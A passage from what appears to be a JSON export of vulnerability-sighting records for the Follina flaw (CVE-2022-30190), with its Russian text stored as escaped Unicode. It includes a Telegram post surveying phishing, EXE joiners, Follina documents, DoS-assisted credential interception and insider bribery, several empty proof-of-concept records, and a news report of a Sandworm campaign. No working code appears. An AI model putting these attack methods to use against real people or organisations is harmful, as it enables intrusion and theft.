\u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 - \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0437\u0430\u043c\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 . 
\u0414\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u0430-\u043b\u044f OSINT \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0446\u0435\u043b\u0438 \u0438 \u043f\u043e\u0442\u043e\u043c \u0443\u0436\u0435 \u0433\u0440\u0430\u043c\u043e\u0442\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438.  \n\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u0441\u043f\u0440\u044f\u0442\u0430\u0442\u044c exe \u0432 \u043b\u044e\u0431\u043e\u043c \u0434\u0440\u0443\u0433\u043e\u043c \u0444\u043e\u0440\u043c\u0430\u0442\u0435 \u044e\u0437\u0430\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0434\u0436\u043e\u0439\u043d\u0435\u0440\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0441 asm exe \u0444\u0430\u043b\u043e\u0432 . \u041f\u043e\u0442\u043e\u043c \u043f\u0440\u0438\u0434\u0443\u043c\u044b\u0432\u0430\u044e \u0431\u043e\u043b\u0435\u0435 \u043b\u0438 \u043c\u0435\u043d\u0435\u0435 \u0443\u0431\u0435\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u043a\u0430\u0437\u043a\u0443 \u0438\u043b\u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442 \u0436\u0435\u0440\u0442\u0432\u0435(\u0430\u043c). 
\u041f\u0440\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u0440\u0438\u0432\u0435\u0434\u0443 \u0432 \u043f\u0440\u0438\u043c\u0435\u0440 \u0447\u0442\u043e \u043d\u0438\u0442\u044c \u043d\u043e\u0432\u0435\u043d\u044c\u043a\u043e\u0435 \u0442\u0430\u043a\u043e\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0437\u0432\u0441\u0442\u043d\u0430\u044f CVE-2022-30190 \u043d\u0430 \u043d\u0435\u0435 \u0435\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b -  \u0442\u044b\u043a .\n\u0427\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442?  \n\u042d\u0442\u0430  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office.\n\u041a\u043e\u0433\u0434\u0430 \u0447\u0442\u043e-\u0442\u043e \u0438\u0434\u0435\u0442 \u043d\u0435 \u0442\u0430\u043a \u0441 Windows \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0438\u0437 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 URL-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b MSDT. 
\n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0432\u044b\u0437\u0432\u0430\u0432\u0448\u0435\u0433\u043e MSDT, \u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043e\u0442\u043a\u0440\u044b\u0432\u0448\u0435\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.\n\u041f\u043e\u0434\u043e\u0431\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \n\n\u0415\u0449\u0435 \u0434\u043b\u044f \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0432\u0435\u0431 \u0441\u0430\u0439\u0442\u044b . \n\u042d\u0442\u043e \u0442\u043e\u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e . 
\n\u0415\u0441\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0433\u0434\u0430 \u0445\u0430\u043a\u0435\u0440 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0438 \u0435\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 . \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u044e\u0437\u0430\u044e\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u043e\u0441 \u0430\u0442\u0430\u043a\u0438 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pyersinia \u0447\u0442\u043e\u0431\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b\u043e\u0441\u044c, \u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 . 
\n\u0412\u043e\u0442 \u0441\u0430\u0442\u044c\u044f \u043f\u0440\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 wireshark \n\n\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 , \u0433\u0434\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \"\u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\" .\n\u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u043f\u0440\u043e\u0445\u043e\u0434\u0438 \u0432 \u0433\u043e\u043b\u043e\u0432\u0443 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 .  \u041a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \"\u0441\u0430\u043c\u043e\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0435 \u0437\u0432\u0435\u043d\u043e \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u044d\u0442\u043e \u0443\u0431\u043e\u0440\u0449\u0438\u0446\u0430\" - \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442 \u0432 \u043a\u043e\u043c\u043f\u0430\u0445 , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u043b\u0430\u0442\u0438\u0442\u044c \u0435\u0439 \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0435\u0448\u043a\u0443\ud83e\udda0  \u0418\u043b\u0438 \u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u043a\u0430\u043a \u0434\u0435\u043b\u0430\u043b\u0438 \u043b\u0430\u043f\u0441\u0443\u0441 
(\u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u0440\u043e\u0441\u0438\u043b\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u043d\u0438\u043c\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u0442\u044c ) . \n\u0415\u0449\u0435 \u0435\u0441\u043b\u0438 \u0443\u0436 \u043d\u0438\u043a\u043e\u0433\u043e \u0438\u0437 \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441\u0430\u043c\u043e\u043c\u0443 . \u0414\u043b\u044f \u0442\u0430\u043a\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0438\u043b\u0438 \u044f \u0433\u0434\u0435-\u0442\u043e \u0432\u0438\u0434\u0435\u043b\u0430 \u0447\u0442\u043e \u043e\u043d\u0438 \u0440\u043e\u044e\u0442\u0441\u044f \u0432 \u043e\u0444\u0438\u0441\u043d\u044b\u0445 \u043c\u0443\u0441\u043e\u0440\u043d\u044b\u0445 \u0431\u0430\u043a\u0430\u0445(\u043d\u0438\u0447\u0435\u0433\u043e \u0441\u043c\u0435\u0448\u043d\u043e\u0433\u043e \u043a\u0442\u043e-\u0442\u043e \u0442\u0443\u0434\u0430 \u0432\u044b\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u0438)  , \u0435\u0449\u0435 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0434\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0437\u0434\u0430\u043d\u0438\u0435 
\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0441\u0442\u043e \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e \u0438\u0434\u0442\u0438 \u0437\u0430 \u043a\u0435\u043c \u0442\u043e.\n\u0412\u043e\u043e\u0431\u0449\u0435 \u0435\u0441\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0440\u043e\u0433\u0438\u0435 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043c\u0435\u0441\u0442\u0430 , \u0442\u0430\u043c \u043e\u043d\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0438\u043b\u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u044f\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0438\u043c\u0435\u043d\u043d\u043e \u0441 \u043d\u0438\u043c\u0438 ..\n\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u0442\u0440\u043e\u043d\u0443 \u043a\u0430\u043a \u0441 \u044d\u0442\u0438\u043c \u0431\u043e\u0440\u043e\u0442\u044c\u0441\u044f .\n\u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0431\u044b\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 , \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0441 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u043f\u043a \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e \u0441\u0432\u043e\u0438 \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 email  \u0441 \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 , \u043d\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c , \u0447\u0430\u0449\u0435 
\u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u0435\u0442\u044c \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a\u043e \u0432\u0441\u0435\u043c\u0443 .  \u041d\u0430\u0441\u0447\u0435\u0442 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0432\u0438\u0434\u0430: \u043a\u0430\u043a \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 , \u043d\u0443 \u044d\u0442\u043e \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u043b\u043e\u0436\u043d\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441 - \u043d\u0430\u0432\u0435\u0440\u043d\u043e\u0435 \u0441\u0442\u043e\u0438\u0442 \u0447\u0430\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 . \u0412\u043e\u043e\u0431\u0449\u0435 \u0442\u0435\u043c\u0430 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043e\u0431\u0448\u0438\u0440\u043d\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043c\u043d\u043e\u0433\u0438\u0435 \u0441\u0444\u0435\u0440\u044b \u0436\u0438\u0437\u043d\u0438  ,\u041d\u041e \u044f \u0434\u0443\u043c\u0430\u044e \u043a\u043e\u0440\u043e\u0442\u043a\u043e \u0432\u044b \u043f\u043e\u043d\u044f\u043b\u0438. 
\u0415\u0441\u043b\u0438 \u0447\u0442\u043e  \u044f \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u0442\u0435\u0439 \u043f\u0440\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u043d\u0438\u0436\u0435 . \n\u0410 \u0442\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0447\u0430\u0441\u0442\u0438 .\n#virus #social_engineering", "creation_timestamp": "2022-09-24T08:34:34.000000Z"}, {"uuid": "01a1e421-d0c0-432f-8295-6eed3a6e4983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/rvXi86HDIl7XGWfAbwrfkCDBY-P6DLuptUq4D-tOA8F9OF0", "content": "", "creation_timestamp": "2026-04-10T15:00:21.000000Z"}, {"uuid": "27040cbf-7dbd-4570-9998-122d29149439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/8wPJR4Zrqe1NVpmz6R4R-oJOE4FmewBY2nxE00bK5aCo0SE", "content": "", "creation_timestamp": "2025-10-18T19:00:11.000000Z"}, {"uuid": "a79ef736-c40a-4873-aed8-160fc4fb8943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/ZHsH8l_PJf6qA-LG3pwKoQfrYnUBM4bmr6171DkIh35gCrQ", "content": "", "creation_timestamp": "2025-10-18T21:00:05.000000Z"}, {"uuid": "b0c09fb6-555b-4216-bab9-346ba17d1049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/JqVwQ-JC9B9ph46qq_gs1KPvHPPLX-_sQPp9do9RGc2keWM", "content": "", "creation_timestamp": "2026-04-10T21:00:05.000000Z"}, {"uuid": "1ae98914-a449-460f-be44-61fd4f13aaf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/825", "content": "\u200b\ud83c\udde8\ud83c\uddf3 \u0425\u0430\u043a\u0435\u0440\u044b Sandworm \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina.\n\n\ud83d\udcac \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u044b\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u0443\u0437\u043d\u0430\u043b\u0430 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438: \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c \u0421\u041c\u0418 (\u0440\u0430\u0434\u0438\u043e\u0441\u0442\u0430\u043d\u0446\u0438\u044f\u043c, \u0433\u0430\u0437\u0435\u0442\u0430\u043c, \u043d\u043e\u0432\u043e\u0441\u0442\u043d\u044b\u043c \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430\u043c \u0438 \u043f\u0440.). 
\u0412 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 CERT-UA \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u044b\u0448\u0435 500 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0442\u0435\u043c\u043e\u0439 \u00ab\u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043a\u0430\u0440\u0442\u044b\u00bb \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442\u0441\u044f \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u044f\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439. 
\u0412 \u043d\u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u00ab\u0421\u041f\u0418\u0421\u041e\u041a\u043f\u043e\u0441\u0438\u043b\u0430\u043d\u044c\u043d\u0430\u0456\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u0456\u043a\u0430\u0440\u0442\u0438.docx\u00bb, \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f HTML-\u0444\u0430\u0439\u043b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0449\u0438\u0439 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439 EXE-\u0444\u0430\u0439\u043b 2.txt. \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e CrescentImp.\n\n\u0412 \u0445\u043e\u0434\u0435 \u0430\u0442\u0430\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Microsoft Windows Support Diagnostic Tool (MSDT), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u043a\u0430\u043a Follina. 
\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Windows. \u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0442 Microsoft \u0434\u043b\u044f \u043d\u0435\u0435 \u043d\u0435\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 0patch \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447.\n\n\u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 CERT-UA, \u0437\u0430 